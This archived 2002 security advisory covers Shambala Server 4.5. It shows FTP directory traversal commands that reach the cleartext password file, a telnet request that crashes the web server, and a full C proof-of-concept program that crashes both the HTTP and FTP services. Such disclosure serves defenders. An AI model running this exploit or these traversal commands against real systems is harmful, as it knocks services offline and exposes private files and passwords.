5th Jun 2002 [SBWID-5404]
COMMAND
Shambala server direcroty traversal and DoS
SYSTEMS AFFECTED
Shambala Server 4.5
PROBLEM
excE @ Telhack 026 Inc [http://www.telhack.tk] found following.
Shambala Server is a personal Web/FTP server for Win 9*/NT. When the
web server is started it also starts the integrated FTP server. There
are are two previous issues that has been disclosed on bugtraq by
zillion in 2000 but he seem to have missed these things.
The integrated FTP server is vulnerable to a directory traversal
attack, that enables attackers to view the entire directory structure
and also download any file in it. There are also a DoS condition
present in the web server.
Impact
======
An authenticated user may view any directory and/or download any file
on the system. An authenticated user may use this to download the
!_cleartext_! password file that lies one .. below the web root.
I have also found a DoS condition in the Web server that generates
\"Run-time error\'5\': Invalid procedure call or argument\" and crashes
the server.
According to www.download.com, the program has been downloaded 57,957
times and 40 times last week. So it seems like this program is still at
use.
Exploits
========
Directory traversal / get any file
----------------------------------
ftp> ls ../../../ - and so on...
ftp> get ../../../ - and so on...
DoS condition in the Web server
-------------------------------
you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is \'^]\'.
GET !\"#¤%&/()=?
Connection closed by foreign host.
you#
Update (10 July 2002)
======
Daniel Nyström (excE) [exce@netwinder.nu] DoS exploit :
/******** shambalax.c ***********************************************************
* *
* PoC exploit for the DoS in Shambala Server 4.5 *
* as described in Telhack 026 Inc. S.A. #3 (BID:4897). *
* I have also built in a function that exploits another *
* DoS condition found by zillion a long long time ago. *
* Also refined my DoS a little bit by just using one *
* char that mess up Shambala. *
* *
* By: Daniel Nyström (excE) <exce@netwinder.nu> *
* *
* *
* Notes: *
* I found that zillion had only been almost right, it *
* is not opening a lot of TCP connection that generates *
* the DoS that he found, it is just one TCP connection, *
* but it certainly has to do with bad connection handling *
* by Shambala. *
* *
* *
* *
* Credits: *
* Zillion <zillion@safemode.org> - for discovering the FTP DoS *
* *
* Greetz: *
* Xenogen <*****@**********.***> - for promising to report any segfaults :) *
* X-Rewt <*****@**********.***> - Cuz he\'s in my school :P *
* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :)) *
* *
*********************************************************** shambalax.c ********/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd;
int port;
int numbytes;
struct sockaddr_in target;
struct hostent *he;
if (argc != 3)
{
fprintf(stderr, \"\\n-- Shambala Server 4.5 DoS exploit --\\n\");
fprintf(stderr, \"\\nUsage: %s <target> <type>\", argv[0]);
fprintf(stderr, \"\\nTypes:\");
fprintf(stderr, \"\\n1 - HTTPD DoS\");
fprintf(stderr, \"\\n2 - FTP DoS\\n\\n\");
exit(1);
}
printf(\"\\n-- Shambala Server 4.5 DoS exploit --\\n\\n\");
printf(\"-> Starting...\\n\");
printf(\"->\\n\");
if ((he=gethostbyname(argv[1])) == NULL)
{
herror(\"gethostbyname\");
exit(1);
}
if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1)
{
perror(\"socket\");
exit(1);
}
/* HTTPD DoS */
if(argv[2][0] == \'1\')
{
port = 80;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(target.sin_zero), 8);
printf(\"-> Connecting to %s:80...\\n\", inet_ntoa(target.sin_addr));
printf(\"->\\n\");
if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
{
perror(\"connect\");
exit(1);
}
printf(\"-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\\n\");
printf(\"->\\n\");
if(send(sockfd, \"!\\r\\n\", 3, 0) == -1)
{
perror(\"send\");
exit(1);
}
close(sockfd);
}
else
/* FTPD DoS */
if(argv[2][0] == \'2\')
{
port = 21;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(target.sin_zero), 8);
printf(\"-> Making a TCP connection (!which crashes server!) to %s:21...\\n\", inet_ntoa(target.sin_addr));
printf(\"->\\n\");
if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
{
perror(\"connect\");
exit(1);
}
close(sockfd);
}
else
{
fprintf(stderr, \"\\n\\nError: Bad type definition (use 1 or 2 for <type>).\\n\\n\");
exit(1);
}
printf(\"-> Exploit finished nicely. %s\'s Shambala is probably dead by now.\\n\\n\", argv[1]);
}
/* EOF - Shambala Server 4.5 DoS exploit */
/* Daniel Nyström (excE) <exce@netwinder.nu> */
SOLUTION
Spent almost 20 minutes digging in the evolvable.com website for an
e-mail adress to contact them by, but none found. So I ended up taking
the e-mail adress from another (2 year old) advisory. Still no reply.
So the fix for now is: Uninstall Shambala.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
